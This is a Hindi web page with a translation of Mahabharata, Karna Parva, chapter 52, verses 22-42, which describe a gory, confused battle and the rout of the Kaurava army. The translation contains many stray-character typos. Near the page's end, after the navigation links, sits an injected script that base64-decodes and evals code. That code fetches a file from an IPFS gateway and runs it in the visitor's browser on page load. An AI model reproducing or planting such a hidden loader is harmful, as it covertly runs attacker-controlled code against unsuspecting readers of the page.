महाभारत कर्ण पर्व अध्याय 52 श्लोक 22-42

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

द्विपञ्चाशत्तम (52) अध्याय: कर्ण पर्व

महाभारत: कर्ण पर्व: द्विपञ्चाशत्तम अध्याय: श्लोक 22-42 का हिन्दी अनुवाद

बाणों और तोमरों द्वारा ताडित होकर कितने ही अश्व धरती पर लोट जाते और हाथियों द्वारा खींचे जाने पर छटपटाते हुए नाना प्रकार के भाव व्यधक्त करते थे। आर्य। वहां घायल होकर पृथ्वीप पर पड़े हुए कितने ही मनुष्य अपने बान्ध व-जनों को देखकर कराह उठते थे। कितने ही अपने बाप दादों को देखकर कुछ अस्फु ट स्वीर में बोलने लगते थे। भरतनन्द न। दूसरे बहुत से मनुष्यद अन्याकन्यह लोगों को दौड़ते देख एक दूसरे से अपने प्रसिद्ध नाम और गौत्र बताने लगते थे। महाराज मनुष्यों की कटी हुई सहस्त्रों सुवर्णभूषित भुजाएं कभी टेढ़ी होकर किसी शरीर से लिपट जाती, कभी छटपटातीं, गिरतीं, ऊपर को उछलतीं, नीचे आ जातीं और तड़पने लगती थीं। प्रजानाथ। सर्पों के शरीरों के समान प्रतीत होने वाली कितनी ही चन्दननचर्चित भुजाएं रणभूमि में पांच मुंहवाले सर्पों के समान महान् वेग प्रकट करतीं तथा रक्तरंजित होने के कारण सुवर्ण मयी ध्वंजाओं के समान अधिकाधिक शोभा पाती थीं। उस घोर घमासान युद्ध के चालू होने पर सम्पू र्ण योद्धा एक दूसरे पर चोट करते हुए बिना जाने पहचाने ही युद्ध करते थे। राजन्। शस्त्रों की धारावाहिक वृष्टि से व्या प्त। तथा धरती की धूल से आच्छायदित हुए उस प्रदेश में अपने और शत्रुपक्ष के सैनिक अन्धरकार से आच्छा दित होने के कारण पहचान में नहीं आते थे।
वह युद्ध ऐसा घोर एवं भयानक हो रहा था कि वहां बारंबार खून की बड़ी-बड़ी नदियां बह चलती थीं। योद्धाओं के कटे हुए मस्तिक शिलाखण्डों के समान उन नदियों को आच्छा दित किये रहते थे। उनके केश ही सेवार और घास के समान प्रतीत होते थे, हड्डियां ही उन में मछलियों के समान व्याेप्ते हो रही थीं, धनुष, बाण और गदाएं नौका के समान जान पड़ती थीं। उनके भीतर मांस और रक्त की ही कीचड़ जमी थी। रक्त के प्रवाह को बढ़ाने वाली उन घोर एवं भयंकर नदियों को वहां योद्धाओं ने प्रवाहित किया था। वे भयानक रुपवाली नदियां कायरों को डराने और शूर वीरों का हर्ष बढ़ाने वाली थीं तथा प्राणियों को यमलोक पहुंचाती थीं। जो उनमें प्रवेश करते, उन्हें वे डुबो देती थीं और क्षत्रियों के मन में भय उत्पपन्न करती थीं। नरव्या।घ्र। वहां गरजते हुए मांसभक्षी जन्तुदओं के शब्दय वह युद्धस्थपल प्रेत राज की नगरी के समान भयानक जान पड़ता था। वहां चारों ओर उठे हुए अगणित कबन्धह और रक्त मांस से तृप्त हुए भूतगण नृत्य़ कर रहे थे। भारत। ये सब के सब रक्त तथा वसा पीकर छके हुए थे। भेदा, वसा, मज्जार और मांस से तृप्तर एवं मतवाले कौए, गीध और बक सब ओर उड़ते दिखायी देते थे। राजन्। उस समर में योद्धाओं के व्रत का पालन करने में विख्यातत शूरवीर जिसका त्याग करना अत्यसन्त् कठिन है, उस भय को छोड़कर निर्भय के समान पराक्रम प्रकट करते थे। बाण और शक्तियों से व्यातप्तन तथा मांसभक्षी जन्तु ओं से भरे हुए उस रणक्षैत्र में शूरवीर अपने पुरुषार्थ की ख्यावति बढ़ाते हुए विचर रहे थे। भारत। प्रभो। रणभूमि में कितने ही योद्धा एक दूसरे को अपने और पिता के नाम तथा गोत्र सुनाते थे। प्रजानाथ। नाम और गोत्र सुनाते हुए बहुतेरे योद्धा शक्ति, तोमर और पट्टिशों द्वारा एक दूसरे को धूल में मिला रहे थे। इस प्रकार वह दारुण एवं भयंकर युद्ध चल ही रहा था कि समुद्र में टूटी हुई नौका के समान कौरव-सेना छिन्न-भिन्न हो गयी और विषाद करने लगी।

इस प्रकार श्रीमहाभारत कर्णपर्व में संकुलयुद्धविषयक बावनवां अध्याय पूरा हुआ।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख